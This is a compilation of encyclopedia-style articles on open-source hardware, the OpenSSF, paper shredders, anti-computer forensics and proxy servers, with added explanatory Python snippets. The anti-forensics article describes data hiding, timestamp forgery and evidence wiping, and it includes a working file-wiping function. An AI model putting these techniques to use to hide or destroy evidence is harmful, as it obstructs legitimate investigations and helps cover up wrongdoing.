Practical guides have been developed to help practitioners do so.[64] Another option is to design products so they are easy to replicate, as exemplified in the concept of open-source appropriate technology.[65] The process of developing open-source hardware in a community-based setting is alternatively called open design, open-source development[66] or open-source product development.[67] All these terms are examples of the open-source model applicable to the development of any product, including software, hardware, and cultural and educational products. Whether open design and the open-source hardware design process involve new design practices or raise requirements for new tools, and whether openness is really key in OSH, remain open questions.[68] See here for a delineation of these terms. A major contributor to the production of open-source hardware product designs is the scientific community. There has been considerable work to produce open-source hardware for scientific hardware using a combination of open-source electronics and 3-D printing.[69][70][71] Other sources of open-source hardware production are vendors of chips and other electronic components sponsoring contests with the provision that the participants and winners must share their designs. Circuit Cellar magazine organizes some of these contests. A guide (Open-Source Lab by Joshua Pearce) has been published on using open-source electronics and 3D printing to make open-source labs. Today, scientists are creating many such labs. Examples include: Open hardware companies are experimenting with business models.[75] For example, littleBits implements open-source business models by making available the circuit designs in each electronics module, in accordance with the CERN Open Hardware License Version 1.2.[76] Another example is Arduino, which registered its name as a trademark; others may manufacture products from Arduino designs but cannot call the products Arduino products.[77] There are many applicable business models for implementing some open-source hardware even in traditional firms. For example, to accelerate development and technical innovation, the photovoltaic industry has experimented with partnerships, franchises, secondary supplier and completely open-source models.[78] Recently, many open-source hardware projects have been funded via crowdfunding on platforms such as Indiegogo, Kickstarter, or Crowd Supply.[79] Richard Stallman, the founder of the free software movement, was in 1999 skeptical of the idea and relevance of free hardware (his terminology for what is now known as open-source hardware).[80] In a 2015 article in Wired magazine, he modified this attitude; he acknowledged the importance of free hardware, but still saw no ethical parallel with free software.[28] Also, Stallman prefers the term free hardware design over open-source hardware, a preference consistent with his earlier rejection of the term open-source software (see also Alternative terms for free software).[28] Other authors, such as Professor Joshua Pearce, have argued there is an ethical imperative for open-source hardware – specifically with respect to open-source appropriate technology for sustainable development.[81] In 2014, he also wrote the book Open-Source Lab: How to Build Your Own Hardware and Reduce Research Costs, which details the development of free and open-source hardware primarily for scientists and university faculty.[82] Pearce, in partnership with Elsevier, introduced the scientific journal HardwareX. It has featured many examples of applications of open-source hardware for scientific purposes.
Further, Vasilis Kostakis et al.[83] have argued that open-source hardware may promote values of equity, diversity and sustainability. Open-source hardware initiatives transcend traditional dichotomies of global-local, urban-rural, and developed-developing contexts. They may leverage cultural differences, environmental conditions, and local needs and resources, while embracing hyper-connectivity, to foster sustainability and collaboration rather than conflict.[83] However, open-source hardware does face some challenges and contradictions. It must navigate tensions between inclusiveness, standardization, and functionality.[83] Additionally, while open-source hardware may reduce pressure on natural resources and local populations, it still relies on energy- and material-intensive infrastructures, such as the Internet. Despite these complexities, Kostakis et al. argue, the open-source hardware framework can serve as a catalyst for connecting and unifying diverse local initiatives under radical narratives, thus inspiring genuine change.[83] OSH has grown as an academic field through the two journals Journal of Open Hardware (JOH) and HardwareX. These journals compete to publish the best OSH designs, and each defines its own requirements for what constitutes acceptable quality of design documents, including specific requirements for build instructions, bills of materials, CAD files, and licences. These requirements are often used by other OSH projects to define how to do an OSH release. These journals also publish papers contributing to the debate about how OSH should be defined and used.
https://en.wikipedia.org/wiki/Open-source_hardware
The Open Source Security Foundation (OpenSSF) is a cross-industry forum for collaborative improvement of open-source software security.[2][3] Part of the Linux Foundation, the OpenSSF works on various technical and educational initiatives to improve the security of the open-source software ecosystem.[4] The OpenSSF was formed in August 2020 as the successor to the Core Infrastructure Initiative, another Linux Foundation project.[5][6] In October 2021, Brian Behlendorf was announced as the OpenSSF's first full-time general manager.[7] In May 2023, OpenSSF announced Omkhar Arasaratnam as its new general manager, and Behlendorf became CTO of the organization.[8] The OpenSSF houses various initiatives under its 10 current working groups.[9][10] The OpenSSF also houses two projects: the code signing and verification service Sigstore[11] and Alpha-Omega, a large-scale effort to improve software supply chain security.[12] The White House held a meeting on software security with government and private sector stakeholders on January 13, 2022.[13] In May 2022, the OpenSSF hosted a follow-up meeting, the Open Source Software Security Summit II, where participants from industry agreed on a 10-point Open Source Software Security Mobilization Plan, which received $30 million in funding commitments.[14][15] In August 2023, the OpenSSF served as an advisor for DARPA's AI Cyber Challenge (AIxCC), a competition around innovation in AI and cybersecurity.[16] In September 2023, the OpenSSF hosted the Secure Open Source Software Summit with the White House, where government agencies and companies discussed security challenges and initiatives around open-source software.[17]
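Sigstore's actual workflow is built around OIDC identities, short-lived certificates and a transparency log; as a loose conceptual sketch of the sign-and-verify primitive that underlies any code-signing service, the following Python fragment uses Ed25519 keys from the third-party cryptography package. This is an illustration of the general idea, not the Sigstore API.

```python
# Conceptual sign/verify sketch with Ed25519 (Python "cryptography" package).
# Sigstore layers identity certificates and a transparency log on top of
# primitives like this; the code below is NOT Sigstore's own interface.
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

private_key = Ed25519PrivateKey.generate()
public_key = private_key.public_key()

artifact = b"release-tarball-bytes"        # stand-in for a real artifact
signature = private_key.sign(artifact)     # distributed alongside the artifact

try:
    public_key.verify(signature, artifact)  # raises if artifact was tampered with
    print("signature valid")
except InvalidSignature:
    print("signature INVALID")
```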
https://en.wikipedia.org/wiki/Open_Source_Security_Foundation
A paper shredder is a mechanical device used to cut sheets of paper into either strips or fine particles. Government organizations, businesses, and private individuals use shredders to destroy private, confidential, or otherwise sensitive documents. The first paper shredder is credited to inventor Abbot Augustus Low, whose patent was filed on February 2, 1909.[1] His invention was never manufactured because he died prematurely soon after filing the patent.[2] Adolf Ehinger's paper shredder, based on a hand-crank pasta maker, was the first to be manufactured, in 1935 in Germany. Supposedly he created a shredding machine to shred his anti-Nazi leaflets to avoid the inquiries of the authorities.[3] Ehinger later marketed and began selling his patented shredders to government agencies and financial institutions, switching from hand-crank to electric-motor shredders.[2] Ehinger's company, EBA Maschinenfabrik, manufactured the first cross-cut paper shredders in 1959 and continues to do so today as EBA Krug & Priester GmbH & Co. in Balingen. Before the fall of the Berlin Wall, a "wet shredder" was invented in the former German Democratic Republic. To prevent paper shredders in the Ministry for State Security (Stasi) from glutting, this device mashed paper snippets with water.[2] With a shift from paper to digital document production, modern industrial shredders have been designed to process non-paper media, such as credit cards and CDs.[2] Until the mid-1980s, it was rare for paper shredders to be used by non-government entities. A prominent example of their use was when the U.S. embassy in Iran used shredders to reduce paper pages to strips before the embassy was taken over in 1979. Some documents were reconstructed from the strips, as detailed below. After Colonel Oliver North told Congress that he used a Schleicher cross-cut model to shred Iran-Contra documents, sales increased nearly 20 percent in 1987.[4] Paper shredders became more popular among U.S. citizens with privacy concerns after the 1988 Supreme Court decision in California v. Greenwood, in which the Supreme Court of the United States held that the Fourth Amendment does not prohibit the warrantless search and seizure of garbage left for collection outside of a home. Anti-burning laws also resulted in increased demand for paper shredding. More recently, concerns about identity theft have driven increased personal use of paper shredders,[5] with the US Federal Trade Commission recommending that individuals shred financial documents before disposal.[6] Information privacy laws such as FACTA, HIPAA, and the Gramm–Leach–Bliley Act drive shredder usage, as businesses and individuals take steps to securely dispose of confidential information. Shredders range in size and price. Small, inexpensive units are designed for a certain number of pages. Large, expensive units are used by commercial shredding services and can shred millions of documents per hour. While the smallest shredders may be hand-cranked, most shredders are electric. Over time, new features were added to improve the user experience, including rejecting paper over capacity to avoid jams, and other safety features to reduce risk.[7][8] Some shredders designed for use in shared workspaces or department copy rooms have noise reduction.[citation needed] Large organizations or shredding services sometimes use "mobile shredding trucks", typically constructed as a box truck with an industrial-size paper shredder mounted inside and storage space for shredded materials.
Such units may also provide the shredding of CDs, DVDs, hard drives, credit cards, and uniforms, among other things.[9] A 'shredding kiosk' is an automated retail machine (or kiosk) that allows public access to a commercial or industrial-capacity paper shredder. This is an alternative solution to the use of a personal or business paper shredder, where the public can use a faster and more powerful shredder, paying for each shredding event rather than purchasing shredding equipment.[citation needed] Some companies outsource their shredding to 'shredding services'. These companies either shred on-site, with mobile shredder trucks, or have off-site shredding facilities. Documents slated for shredding are often placed in locked bins that are emptied periodically. As well as size and capacity, shredders are classified according to the method they use, and the size and shape of the shreds they produce. There are a number of standards covering the security levels of paper shredders, including: The previous DIN 32757 standard has now been replaced with DIN 66399. This is complex,[10] but can be summarized as below: The United States National Security Agency and Central Security Service produce "NSA/CSS Specification 02-01 for High Security Crosscut Paper Shredders". They provide a list of evaluated shredders.[11] The International Organization for Standardization and the International Electrotechnical Commission produce "ISO/IEC 21964 Information technology — Destruction of data carriers".[12][13][14] The General Data Protection Regulation (GDPR), which came into force in May 2018, regulates the handling and processing of personal data. ISO/IEC 21964 and DIN 66399 support data protection in business processes.[citation needed] There have been many instances where it is alleged that documents have been improperly or illegally destroyed by shredding, including: For paper shredders to achieve their purpose, it should not be possible to reassemble and read shredded documents. In practice, this depends on how well the shredding has been done, and the resources put into reconstruction. The amount of effort put into reconstruction often depends on the importance of the document, e.g. whether it is a simple personal matter, corporate espionage, a criminal matter, or a matter of national security. The difficulty of reconstruction can depend on the size and legibility of the text, whether the document is single- or double-sided, the size and shape of the shredded pieces, the orientation of the material when fed, how effectively the shredded material is further randomized afterwards, and whether other processes such as pulping and chemical decomposition are used. Even without a full reconstruction, in some cases useful information can be obtained by forensic analysis of the paper, ink, and cutting method. The individual shredder that was used to destroy a given document may sometimes be of forensic interest. Shredders display certain device-specific characteristics, "fingerprints", like the exact spacing of the blades and the degree and pattern of their wear. By closely examining the shredded material, the minute variations in the size of the paper strips and the microscopic marks on their edges may allow them to be linked to a specific machine.[25] (cf. the forensic identification of typewriters.) The resulting shredded paper can be recycled in a number of ways, including:
https://en.wikipedia.org/wiki/Paper_shredder
Anti–computer forensics or counter-forensics are techniques used to obstruct forensic analysis. Anti-forensics has only recently[when?] been recognized as a legitimate field of study. One of the more widely known and accepted definitions comes from Marc Rogers. One of the earliest detailed presentations of anti-forensics, in Phrack Magazine in 2002, defines anti-forensics as "the removal, or hiding, of evidence in an attempt to mitigate the effectiveness of a forensics investigation".[1] A more abbreviated definition is given by Scott Berinato in his article entitled "The Rise of Anti-Forensics": "Anti-forensics is more than technology. It is an approach to criminal hacking that can be summed up like this: Make it hard for them to find you and impossible for them to prove they found you."[2] Neither author takes into account using anti-forensics methods to ensure the privacy of one's personal data. Anti-forensics methods are often broken down into several sub-categories to make classification of the various tools and techniques simpler. One of the more widely accepted subcategory breakdowns was developed by Dr. Marcus Rogers. He has proposed the following sub-categories: data hiding, artifact wiping, trail obfuscation and attacks against the CF (computer forensics) processes and tools.[3] Attacks against forensics tools directly have also been called counter-forensics.[4] Within the field of digital forensics, there is much debate over the purpose and goals of anti-forensic methods. The conventional wisdom is that anti-forensic tools are purely malicious in intent and design. Others believe that these tools should be used to illustrate deficiencies in digital forensic procedures, digital forensic tools, and forensic examiner education. This sentiment was echoed at the 2005 Blackhat Conference by anti-forensic tool authors James Foster and Vinnie Liu.[5] They stated that by exposing these issues, forensic investigators will have to work harder to prove that collected evidence is both accurate and dependable. They believe that this will result in better tools and education for the forensic examiner. Also, counter-forensics has significance for defence against espionage, as recovering information with forensic tools serves the goals of spies equally as well as investigators. Data hiding is the process of making data difficult to find while also keeping it accessible for future use. "Obfuscation and encryption of data give an adversary the ability to limit identification and collection of evidence by investigators while allowing access and use to themselves."[6] Some of the more common forms of data hiding include encryption, steganography and other various forms of hardware/software-based data concealment. Each of the different data hiding methods makes digital forensic examinations difficult. When the different data hiding methods are combined, they can make a successful forensic investigation nearly impossible. One of the more commonly used techniques to defeat computer forensics is data encryption. In a presentation given on encryption and anti-forensic methodologies, the Vice President of Secure Computing, Paul Henry, referred to encryption as a "forensic expert's nightmare".[7] The majority of publicly available encryption programs allow the user to create virtual encrypted disks which can only be opened with a designated key. Through the use of modern encryption algorithms and various encryption techniques these programs make the data virtually impossible to read without the designated key.
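The symmetric-key encryption these programs rely on can be illustrated with a short, hedged sketch using the widely available Python cryptography package. This is a minimal illustration of the general principle (authenticated symmetric encryption under a single key), not a reconstruction of any particular disk-encryption tool:

```python
# Minimal sketch of symmetric encryption with the Python "cryptography"
# package (Fernet: AES in CBC mode with HMAC authentication). Without the
# key, the ciphertext is computationally infeasible to read.
from cryptography.fernet import Fernet

key = Fernet.generate_key()          # the "designated key"
cipher = Fernet(key)

plaintext = b"sensitive document contents"
token = cipher.encrypt(plaintext)    # opaque ciphertext; safe to store on disk

# Only a holder of `key` can recover the plaintext.
assert Fernet(key).decrypt(token) == plaintext
```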
File-level encryption encrypts only the file contents. This leaves important information such as the file name, size and timestamps unencrypted. Parts of the content of the file can be reconstructed from other locations, such as temporary files, the swap file and deleted, unencrypted copies. Most encryption programs have the ability to perform a number of additional functions that make digital forensic efforts increasingly difficult. Some of these functions include the use of a keyfile, full-volume encryption, and plausible deniability. The widespread availability of software containing these functions has put the field of digital forensics at a great disadvantage. Steganography is a technique where information or files are hidden within another file in an attempt to hide data by leaving it in plain sight. "Steganography produces dark data that is typically buried within light data (e.g., a non-perceptible digital watermark buried within a digital photograph)."[8] While some experts have argued that the use of steganography techniques is not very widespread and therefore the subject should not be given a lot of thought, most experts agree that steganography has the capability of disrupting the forensic process when used correctly.[2] According to Jeffrey Carr, a 2007 edition of Technical Mujahid (a bi-monthly terrorist publication) outlined the importance of using a steganography program called Secrets of the Mujahideen. According to Carr, the program was touted as giving the user the capability to avoid detection by current steganalysis programs. It did this through the use of steganography in conjunction with file compression.[9] Other forms of data hiding involve the use of tools and techniques to hide data throughout various locations in a computer system. Some of these places can include "memory, slack space, hidden directories, bad blocks, alternate data streams, (and) hidden partitions."[3] One of the more well-known tools that is often used for data hiding is called Slacker (part of the Metasploit framework).[10] Slacker breaks up a file and places each piece of that file into the slack space of other files, thereby hiding it from the forensic examination software.[8] Another data hiding technique involves the use of bad sectors. To perform this technique, the user changes a particular sector from good to bad and then data is placed onto that particular cluster. The belief is that forensic examination tools will see these clusters as bad and continue on without any examination of their contents.[8] The methods used in artifact wiping are tasked with permanently eliminating particular files or entire file systems. This can be accomplished through the use of a variety of methods that include disk cleaning utilities, file wiping utilities and disk degaussing/destruction techniques.[3] Disk cleaning utilities use a variety of methods to overwrite the existing data on disks (see data remanence). The effectiveness of disk cleaning utilities as anti-forensic tools is often challenged, as some believe they are not completely effective. Experts who do not believe that disk cleaning utilities are acceptable for disk sanitization base their opinions on current DoD policy, which states that the only acceptable form of sanitization is degaussing. (See National Industrial Security Program.) Disk cleaning utilities are also criticized because they leave signatures that the file system was wiped, which in some cases is unacceptable.
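As a rough sketch of what overwrite-based wiping utilities do conceptually, the following Python fragment overwrites a file's contents with random bytes before unlinking it. Note the caveats from the surrounding text: journaling file systems and SSD wear-levelling may preserve copies, so this illustrates the principle rather than guaranteeing sanitization, and the file name is hypothetical:

```python
# Conceptual sketch of a single-file overwrite-and-delete pass, in the
# spirit of file wiping utilities. Real tools make multiple patterned
# passes and handle metadata; SSDs and journaling file systems can defeat
# this approach entirely.
import os

def wipe_file(path: str, passes: int = 3) -> None:
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))   # overwrite contents with random bytes
            f.flush()
            os.fsync(f.fileno())        # force the pass out to the device
    os.remove(path)                      # finally unlink the file

# wipe_file("secret_draft.txt")  # hypothetical file name
```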
Some of the widely used disk cleaning utilities include DBAN, srm, BCWipe Total WipeOut, KillDisk, PC Inspector and CyberScrub cyberCide. Another option, which is approved by the NIST and the NSA, is CMRR Secure Erase, which uses the Secure Erase command built into the ATA specification. File wiping utilities are used to delete individual files from an operating system. The advantage of file wiping utilities is that they can accomplish their task in a relatively short amount of time, as opposed to disk cleaning utilities, which take much longer. Another advantage of file wiping utilities is that they generally leave a much smaller signature than disk cleaning utilities. There are two primary disadvantages of file wiping utilities: first, they require user involvement in the process, and second, some experts believe that file wiping programs do not always correctly and completely wipe file information.[11][12] Some of the widely used file wiping utilities include BCWipe, R-Wipe & Clean, Eraser, Aevita Wipe & Delete and CyberScrubs PrivacySuite. On Linux, tools like shred and srm can also be used to wipe single files.[13][14] SSDs are by design more difficult to wipe, since the firmware can write to other cells, therefore allowing data recovery. In these instances ATA Secure Erase should be used on the whole drive, with tools like hdparm that support it.[15] Disk degaussing is a process by which a magnetic field is applied to a digital media device. The result is a device that is entirely clean of any previously stored data. Degaussing is rarely used as an anti-forensic method despite the fact that it is an effective means to ensure data has been wiped. This is attributed to the high cost of degaussing machines, which are difficult for the average consumer to afford. A more commonly used technique to ensure data wiping is the physical destruction of the device. The NIST recommends that "physical destruction can be accomplished using a variety of methods, including disintegration, incineration, pulverizing, shredding and melting."[16] The purpose of trail obfuscation is to confuse, disorient, and divert the forensic examination process. Trail obfuscation covers a variety of techniques and tools that include "log cleaners, spoofing, misinformation, backbone hopping, zombied accounts, trojan commands."[3] One of the more widely known trail obfuscation tools is Timestomp (part of the Metasploit Framework).[10] Timestomp gives the user the ability to modify file metadata pertaining to access, creation and modification times/dates.[2] By using programs such as Timestomp, a user can render any number of files useless in a legal setting by directly calling into question the files' credibility.[citation needed] Another well-known trail-obfuscation program is Transmogrify (also part of the Metasploit Framework).[10] In most file types the header of the file contains identifying information. A (.jpg) would have header information that identifies it as a (.jpg), a (.doc) would have information that identifies it as a (.doc), and so on. Transmogrify allows the user to change the header information of a file, so a (.jpg) header could be changed to a (.doc) header. If a forensic examination program or operating system were to conduct a search for images on a machine, it would simply see a (.doc) file and skip over it.[2] In the past, anti-forensic tools have focused on attacking the forensic process by destroying data, hiding data, or altering data usage information.
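The header-based file identification that Transmogrify subverts can be sketched as follows. This is a simplified, hedged illustration of magic-byte checking, not the Metasploit tool itself, and the signature list is deliberately minimal:

```python
# Simplified magic-byte sniffing: identify a file by its leading bytes
# rather than its extension. Changing these bytes (as Transmogrify does)
# misleads tools that trust the header alone.
MAGIC = {
    b"\xff\xd8\xff": "JPEG image",
    b"\x89PNG\r\n\x1a\n": "PNG image",
    b"%PDF": "PDF document",
    b"PK\x03\x04": "ZIP container (also .docx, .odt, ...)",
}

def sniff(path: str) -> str:
    with open(path, "rb") as f:
        head = f.read(16)
    for magic, name in MAGIC.items():
        if head.startswith(magic):
            return name
    return "unknown"

# print(sniff("report.doc"))  # hypothetical path; a renamed JPEG would
#                             # still be reported as "JPEG image"
```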
Anti-forensics has recently moved into a new realm where tools and techniques are focused on attacking the forensic tools that perform the examinations. These new anti-forensic methods have benefited from a number of factors, including well-documented forensic examination procedures, widely known forensic tool vulnerabilities, and digital forensic examiners' heavy reliance on their tools.[3] During a typical forensic examination, the examiner would create an image of the computer's disks. This keeps the original computer (evidence) from being tainted by forensic tools. Hashes are created by the forensic examination software to verify the integrity of the image. One of the recent anti-tool techniques targets the integrity of the hash that is created to verify the image. By affecting the integrity of the hash, any evidence that is collected during the subsequent investigation can be challenged.[3] To prevent physical access to data while the computer is powered on (from a grab-and-go theft, for instance, as well as seizure by law enforcement), there are different solutions that could be implemented: Some of these methods rely on shutting the computer down, while the data might be retained in the RAM from a couple of seconds up to a couple of minutes, theoretically allowing for a cold boot attack.[21][22][23] Cryogenically freezing the RAM might extend this time even further, and some attacks in the wild have been spotted.[24] Methods to counteract this attack exist and can overwrite the memory before shutting down. Some anti-forensic tools even detect the temperature of the RAM to perform a shutdown when below a certain threshold.[25][26] Attempts to create a tamper-resistant desktop computer have been made (as of 2020, the ORWL model is one of the best examples). However, the security of this particular model is debated by security researcher and Qubes OS founder Joanna Rutkowska.[27] While the study and applications of anti-forensics are generally available to protect users from forensic attacks on their confidential data by their adversaries (e.g. investigative journalists, human rights defenders, activists, corporate or government espionage), Marcus Rogers of Purdue University notes that anti-forensics tools can also be used by criminals. Rogers uses a more traditional "crime scene" approach when defining anti-forensics: "Attempts to negatively affect the existence, amount and/or quality of evidence from a crime scene, or make the analysis and examination of evidence difficult or impossible to conduct."[3] Anti-forensic methods rely on several weaknesses in the forensic process, including: the human element, dependency on tools, and the physical/logical limitations of computers.[28] By reducing the forensic process's susceptibility to these weaknesses, an examiner can reduce the likelihood of anti-forensic methods successfully impacting an investigation.[28] This may be accomplished by providing increased training for investigators and corroborating results using multiple tools.
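The image-integrity hashing described above can be sketched with Python's standard hashlib module. A minimal example, assuming a raw disk image file (the file name is hypothetical), computing a SHA-256 digest in fixed-size chunks so arbitrarily large images do not need to fit in memory:

```python
# Minimal sketch of forensic image hashing: compute a SHA-256 digest of a
# disk image in fixed-size chunks. Re-hashing later and comparing digests
# verifies that the image has not been altered since acquisition.
import hashlib

def image_digest(path: str, chunk_size: int = 1 << 20) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            h.update(chunk)
    return h.hexdigest()

# digest = image_digest("evidence.dd")  # hypothetical image file name
# Store the digest separately from the image; any later mismatch signals
# that the image (or the digest) has been tampered with.
```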
https://en.wikipedia.org/wiki/Anti-computer_forensics
In computer networking, a proxy server is a server application that acts as an intermediary between a client requesting a resource and the server providing that resource.[1] It improves privacy, security, and possibly performance in the process. Instead of connecting directly to a server that can fulfill a request for a resource, such as a file or web page, the client directs the request to the proxy server, which evaluates the request and performs the required network transactions. This serves as a method to simplify or control the complexity of the request, or provide additional benefits such as load balancing, privacy, or security. Proxies were devised to add structure and encapsulation to distributed systems.[2] A proxy server thus functions on behalf of the client when requesting service, potentially masking the true origin of the request to the resource server.

A proxy server may reside on the user's local computer, or at any point between the user's computer and destination servers on the Internet. A proxy server that passes unmodified requests and responses is usually called a gateway or sometimes a tunneling proxy. A forward proxy is an Internet-facing proxy used to retrieve data from a wide range of sources (in most cases, anywhere on the Internet). A reverse proxy is usually an internal-facing proxy used as a front-end to control and protect access to a server on a private network. A reverse proxy commonly also performs tasks such as load-balancing, authentication, decryption, and caching.[3]

An open proxy is a forwarding proxy server that is accessible by any Internet user. In 2008, network security expert Gordon Lyon estimated that "hundreds of thousands" of open proxies are operated on the Internet.[4]

A reverse proxy (or surrogate) is a proxy server that appears to clients to be an ordinary server. Reverse proxies send requests to one or more ordinary servers that handle the request. The response from the original server is returned as if it came directly from the proxy server, leaving the client with no knowledge of the original server.[5] Reverse proxies are installed in the vicinity of one or more web servers. All traffic coming from the Internet with a destination of one of the neighborhood's web servers goes through the proxy server. The use of "reverse" originates in its counterpart "forward proxy", since the reverse proxy sits closer to the web server and serves only a restricted set of websites. There are several reasons for installing reverse proxy servers, such as load balancing, security, and caching.

A forward proxy is a server that routes traffic between clients and another system, which is in most cases external to the network. This means it can regulate traffic according to preset policies, convert and mask client IP addresses, enforce security protocols, and block unknown traffic. A forward proxy enhances security and policy enforcement within an internal network.[6] A reverse proxy, instead of protecting the client, is used to protect the servers. A reverse proxy accepts a request from a client, forwards that request to another one of many other servers, and then returns the results from the server that specifically processed the request to the client. Effectively, a reverse proxy acts as a gateway between clients, users and application servers, and handles all the traffic routing whilst also protecting the identity of the server that physically processes the request.[7]
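A tunneling proxy or gateway of the kind described above can be illustrated in a few lines. The sketch below (addresses are placeholders) simply relays bytes unmodified between a client and a fixed upstream server, so the origin server sees the proxy's address rather than the client's. It is a minimal sketch, not a full HTTP-aware forward proxy:

```python
import socket
import threading

LISTEN_ADDR = ("127.0.0.1", 8888)    # where local clients connect (placeholder)
UPSTREAM_ADDR = ("example.org", 80)  # the origin server being proxied (placeholder)

def pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src closes."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        dst.close()

def handle(client: socket.socket) -> None:
    upstream = socket.create_connection(UPSTREAM_ADDR)
    # Relay traffic in both directions; the origin server only ever
    # sees the proxy's address, not the client's.
    threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
    pipe(upstream, client)

def main() -> None:
    with socket.create_server(LISTEN_ADDR) as srv:
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

if __name__ == "__main__":
    main()
```

Real forward proxies additionally parse the request to pick the destination per request, rather than relaying to one fixed upstream.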
A content-filtering web proxy server provides administrative control over the content that may be relayed in one or both directions through the proxy. It is commonly used in both commercial and non-commercial organizations (especially schools) to ensure that Internet usage conforms to an acceptable use policy. Content-filtering proxy servers often support user authentication to control web access. They also usually produce logs, either to give detailed information about the URLs accessed by specific users or to monitor bandwidth usage statistics. They may also communicate with daemon-based or ICAP-based antivirus software to provide security against viruses and other malware by scanning incoming content in real time before it enters the network.

Many workplaces, schools, and colleges restrict the web sites and online services that are accessible and available in their buildings. Governments also censor undesirable content. This is done either with a specialized proxy, called a content filter (both commercial and free products are available), or by using a cache-extension protocol such as ICAP, which allows plug-in extensions to an open caching architecture. Websites commonly used by students to circumvent filters and access blocked content often include a proxy, from which the user can then access the websites that the filter is trying to block.

Requests may be filtered by several methods, such as URL or DNS blacklists, URL regex filtering, MIME filtering, or content keyword filtering; a minimal sketch of such request filtering follows below. Blacklists are often provided and maintained by web-filtering companies, often grouped into categories (pornography, gambling, shopping, social networks, etc.). Assuming the requested URL is acceptable, the proxy then fetches the content. At this point, a dynamic filter may be applied on the return path. For example, JPEG files could be blocked based on fleshtone matches, or language filters could dynamically detect unwanted language. If the content is rejected, an HTTP fetch error may be returned to the requester. Most web-filtering companies use an internet-wide crawling robot that assesses the likelihood that content is of a certain type. The resulting database is corrected by manual labor based on complaints or known flaws in the content-matching algorithms.[8]

Some proxies scan outbound content, e.g., for data loss prevention, or scan content for malicious software. Web-filtering proxies are not able to peer inside secure sockets HTTP transactions, assuming the chain of trust of SSL/TLS (Transport Layer Security) has not been tampered with. The SSL/TLS chain of trust relies on trusted root certificate authorities. In a workplace setting where the client is managed by the organization, devices may be configured to trust a root certificate whose private key is known to the proxy. In such situations, proxy analysis of the contents of an SSL/TLS transaction becomes possible. The proxy is effectively operating a man-in-the-middle attack, allowed by the client's trust of a root certificate the proxy owns.

If the destination server filters content based on the origin of the request, the use of a proxy can circumvent this filter. For example, a server using IP-based geolocation to restrict its service to a certain country can be accessed using a proxy located in that country to access the service.[9]: 3
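Here is the promised sketch of request filtering, assuming hand-written policy data in place of the vendor-maintained category blacklists a real deployment would use:

```python
import re
from urllib.parse import urlparse

# Hypothetical policy data: real deployments use vendor-maintained,
# categorised blacklists rather than hand-written sets.
BLOCKED_DOMAINS = {"casino.example", "tracker.example"}
BLOCKED_PATTERNS = [re.compile(r"gambling|lottery", re.IGNORECASE)]
BLOCKED_MIME_PREFIXES = ("application/x-msdownload",)

def is_request_allowed(url: str) -> bool:
    """Apply domain-blacklist and URL-regex checks before fetching."""
    host = urlparse(url).hostname or ""
    if host in BLOCKED_DOMAINS or any(host.endswith("." + d) for d in BLOCKED_DOMAINS):
        return False
    return not any(p.search(url) for p in BLOCKED_PATTERNS)

def is_response_allowed(mime_type: str) -> bool:
    """MIME filtering applied on the return path, after the fetch."""
    return not mime_type.startswith(BLOCKED_MIME_PREFIXES)

print(is_request_allowed("http://casino.example/promo"))  # False
print(is_response_allowed("text/html"))                   # True
```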
Web proxies are the most common means of bypassing government censorship, although no more than 3% of Internet users use any circumvention tools.[9]: 7 Some proxy service providers allow businesses access to their proxy network for rerouting traffic for business intelligence purposes.[10] In some cases, users can circumvent proxies that filter using blacklists by using services designed to proxy information from a non-blacklisted location.[11]

Proxies can be installed in order to eavesdrop upon the data flow between client machines and the web. All content sent or accessed, including passwords submitted and cookies used, can be captured and analyzed by the proxy operator. For this reason, passwords to online services (such as webmail and banking) should always be exchanged over a cryptographically secured connection, such as SSL. By chaining proxies which do not reveal data about the original requester, it is possible to obfuscate activities from the eyes of the user's destination. However, more traces will be left on the intermediate hops, which could be used or offered up to trace the user's activities. If the policies and administrators of these other proxies are unknown, the user may fall victim to a false sense of security just because those details are out of sight and mind. In what is more of an inconvenience than a risk, proxy users may find themselves being blocked from certain web sites, as numerous forums and web sites block IP addresses from proxies known to have spammed or trolled the site. Proxy bouncing can be used to maintain privacy.

A caching proxy server accelerates service requests by retrieving content saved from a previous request made by the same client or even other clients.[12] Caching proxies keep local copies of frequently requested resources, allowing large organizations to significantly reduce their upstream bandwidth usage and costs, while significantly increasing performance; a toy sketch of this behavior follows below. Most ISPs and large businesses have a caching proxy. Caching proxies were the first kind of proxy server. Web proxies are commonly used to cache web pages from a web server.[13] Poorly implemented caching proxies can cause problems, such as an inability to use user authentication.[14]

A proxy that is designed to mitigate specific link-related issues or degradation is a performance-enhancing proxy (PEP). PEPs are typically used to improve TCP performance in the presence of high round-trip times or high packet loss (such as wireless or mobile phone networks), or on highly asymmetric links featuring very different upload and download rates. PEPs can make more efficient use of the network, for example, by merging TCP ACKs (acknowledgements) or compressing data sent at the application layer.[15]

A translation proxy is a proxy server that is used to localize a website experience for different markets. Traffic from the global audience is routed through the translation proxy to the source website. As visitors browse the proxied site, requests go back to the source site where pages are rendered. The original-language content in the response is replaced by the translated content as it passes back through the proxy. The translations used in a translation proxy can be machine translation, human translation, or a combination of the two. Different translation proxy implementations have different capabilities. Some allow further customization of the source site for local audiences, such as excluding the source content or substituting it with original local content.
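The caching behavior described above reduces to "serve a local copy while it is fresh". A toy sketch with a fixed time-to-live; a real caching proxy honours Cache-Control and Expires headers and persists entries to disk:

```python
import time
import urllib.request

# In-memory cache: URL -> (expiry time, body).
_cache: dict[str, tuple[float, bytes]] = {}
TTL_SECONDS = 300.0

def cached_fetch(url: str) -> bytes:
    """Serve repeated requests for the same URL from a local copy."""
    now = time.monotonic()
    hit = _cache.get(url)
    if hit and hit[0] > now:
        return hit[1]                      # cache hit: no upstream traffic
    with urllib.request.urlopen(url) as resp:
        body = resp.read()
    _cache[url] = (now + TTL_SECONDS, body)
    return body

first = cached_fetch("http://example.com/")   # fetched upstream
second = cached_fetch("http://example.com/")  # served from the cache
assert first == second
```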
